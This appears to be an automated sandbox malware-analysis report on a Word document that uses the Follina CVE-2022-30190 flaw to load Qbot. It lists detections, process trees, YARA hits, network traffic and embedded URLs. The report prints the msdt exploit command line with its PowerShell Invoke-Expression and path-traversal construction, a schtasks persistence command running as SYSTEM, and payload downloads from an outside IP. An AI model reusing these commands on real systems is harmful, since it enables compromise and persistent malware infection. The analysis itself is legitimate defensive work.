
Windows Analysis Report
doc782.docx

Overview

General Information

Sample Name: doc782.docx
Analysis ID: 640940
MD5: e7015438268464cedad98b1544d643ad
SHA1: 03ef0e06d678a07f0413d95f0deb8968190e4f6b
SHA256: d20120cc046cef3c3f0292c6cbc406fcf2a714aa8e048c9188f1184e4bb16c93

Detection

CryptOne, Follina CVE-2022-30190, Qbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Qbot
Multi AV Scanner detection for submitted file
Yara detected CryptOne packer
Sigma detected: Schedule system process
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 7032 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 5960 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • MSOSYNC.EXE (PID: 5160 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 2984 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'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'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • csc.exe (PID: 4480 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 1124 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2969.tmp" "c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 4384 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 4536 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4732.tmp" "c:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • regsvr32.exe (PID: 1320 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A MD5: 426E7499F6A7346F0410DEAD0805586B)
    • explorer.exe (PID: 4384 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • regsvr32.exe (PID: 5688 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A MD5: 426E7499F6A7346F0410DEAD0805586B)
    • explorer.exe (PID: 2256 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • schtasks.exe (PID: 4456 cmdline: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06 MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 1548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • regsvr32.exe (PID: 4768 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A MD5: 426E7499F6A7346F0410DEAD0805586B)
    • explorer.exe (PID: 5492 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • csc.exe (PID: 5404 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 4496 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B1C.tmp" "c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • regsvr32.exe (PID: 6036 cmdline: regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t1.A" MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 3976 cmdline: -s "C:\Users\user\AppData\Local\Temp\t1.A" MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup
Yara matches (PCAP)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |

Yara matches (dropped files)

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htm | MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard | 0x1447:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htm | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES | MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard | 0x1447:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16E37148.htm | MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard | 0x1447:$re1: location.href = "ms-msdt:

Yara matches (memory dumps, 5 of 18 entries shown)

Source | Rule | Description | Author | Strings
0000001B.00000002.672940732.00000000043F0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
00000021.00000002.710753771.0000000002E60000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
00000020.00000000.671132506.0000000002F80000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
00000021.00000000.671727955.0000000002E60000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |

Yara matches (unpacked PE files, 5 of 25 entries shown)

Source | Rule | Description | Author | Strings
27.2.regsvr32.exe.4990000.3.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
27.2.regsvr32.exe.43f0000.1.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
29.2.regsvr32.exe.4ad0000.2.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
27.2.regsvr32.exe.43c0184.0.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
28.2.regsvr32.exe.810184.0.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |

                            Persistence and Installation Behavior

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06, CommandLine: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 2256, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06, ProcessId: 4456, ProcessName: schtasks.exe
Timestamp: 06/07/22-19:44:37.058628
Source IP: 185.234.247.119
Destination IP: 192.168.2.22
Source Port: 80
Destination Port: 49171
SID: 2036726
Protocol: TCP
Classtype: Attempted User Privilege Gain

                            AV Detection

Source: doc782.docx, Virustotal: Detection: 28%
Source: doc782.docx, ReversingLabs: Detection: 17%
Source: 32.2.explorer.exe.2f80000.0.unpack, Malware Configuration Extractor: Qbot, Bot id: obama186, Campaign: 1654596660, Version: 403.694 (C2 list omitted)

                            Exploits

Source: Yara match, File source: dump.pcap, type: PCAP
Source: Yara match, File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htm, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16E37148.htm, type: DROPPED
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: amstream.pdb, source: explorer.exe, 00000020.00000003.675706177.0000000005221000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.674870677.0000000004DAB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.678475892.0000000004D51000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: amstream.pdbGCTL, source: explorer.exe, 00000020.00000003.675706177.0000000005221000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.674870677.0000000004DAB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.678475892.0000000004D51000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 27_2_0499BCFC FindFirstFileW,FindNextFileW,
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 28_2_042ABCFC FindFirstFileW,FindNextFileW,
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 29_2_04AFBCFC FindFirstFileW,FindNextFileW,
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 32_2_02F8BCFC FindFirstFileW,FindNextFileW,

                            Software Vulnerabilities

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, Process created: C:\Windows\SysWOW64\msdt.exe
Source: global traffic, TCP traffic: 192.168.2.5:49744 -> 185.234.247.119:80
Source: global traffic, TCP traffic: 192.168.2.5:49763 -> 185.234.247.119:80

                            Networking

Source: Traffic, Snort IDS: 2036726 ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) 185.234.247.119:80 -> 192.168.2.22:49171
Source: Joe Sandbox View, ASN Name: INTERKONEKT-ASPL INTERKONEKT-ASPL
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 07 Jun 2022 17:51:26 GMT
    Content-Type: application/octet-stream
    Content-Length: 1437696
    Connection: keep-alive
    Accept-Ranges: bytes
    Expires: 0
    Cache-Control: no-cache, no-store, must-revalidate
    Content-Disposition: attachment;
    Data Raw: (hex dump of the response body omitted)
Source: global traffic, HTTP traffic detected: GET /123.RES HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
    Accept-Encoding: gzip, deflate
    Host: 185.234.247.119
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /123.RES HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
    Accept-Encoding: gzip, deflate
    Host: 185.234.247.119
    If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMT
    If-None-Match: "6299dd5d-1861"
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /972639944.dat HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
    Host: 185.234.247.119
    Connection: Keep-Alive
Source: unknown, TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: ~WRS{677538CC-22A1-43D9-BD9A-C629280F1C4E}.tmp.0.dr, String found in binary or memory: http://185.234.247.119:80/123.RES
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr, String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: msdt.exe, 00000007.00000002.713967957.0000000005990000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://crl.micro
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr, String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr, String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Types
Source: explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/soap/http
Source: regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/wsdl/mime/
Source: regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/
Source: explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/#
Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr, String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: regsvr32.exe, 0000001C.00000002.672872094.0000000000867000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://www.borland.com/namespaces/Types
Source: regsvr32.exe, 00000026.00000002.713602734.0000000002F30000.00000004.00001000.00020000.00000000.sdmp, String found in binary or memory: http://www.borland.com/namespaces/Types-IWSDLPublish
Source: explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp, String found in binary or memory: http://www.borland.com/namespaces/TypesU
Source: explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp, String found in binary or memory: http://www.borland.com/namespaces/Typeshhttp://www.borland.com/namespaces/Types-IWSDLPublish
Source: regsvr32.exe, 0000001B.00000002.672627187.0000000002BD7000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://www.borland.com/namespaces/Typesp
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.aadrm.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.aadrm.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.cortana.ai
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.diagnostics.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.microsoftstream.com/api/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.office.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.onedrive.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://apis.live.net/v5.0/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://augloop.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://augloop.office.com/v2
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cdn.entity.
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://clients.config.office.net/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://config.edge.skype.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cortana.ai
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cortana.ai/api
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cr.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dataservice.o365filtering.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dataservice.o365filtering.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dev.cortana.ai
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://devnull.onenote.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://directory.services.
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
